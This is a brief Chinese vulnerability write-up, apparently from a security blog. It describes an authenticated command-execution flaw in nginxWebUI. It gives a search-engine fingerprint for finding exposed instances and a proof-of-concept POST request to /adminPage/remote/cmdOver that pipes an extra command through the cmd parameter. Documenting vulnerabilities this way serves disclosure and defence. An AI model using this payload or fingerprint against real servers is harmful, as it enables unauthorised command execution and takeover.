nginxWebUI cmdOver 后台命令执行漏洞
# nginxWebUI cmdOver 后台命令执行漏洞
## 漏洞描述
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
## 漏洞影响
nginxWebUI
## 网络测绘...
nginxWebUI cmdOver 后台命令执行漏洞
漏洞描述
nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限
漏洞影响
nginxWebUI
网络测绘
title="nginxwebui"
漏洞复现
登录页面
验证请求包
POST /adminPage/remote/cmdOver
remoteId=local&cmd=start|id&interval=1
- 发表于 2024-07-12 18:46:31
- 阅读 ( 1972 )
- 分类:Web应用
带头大哥
456 篇文章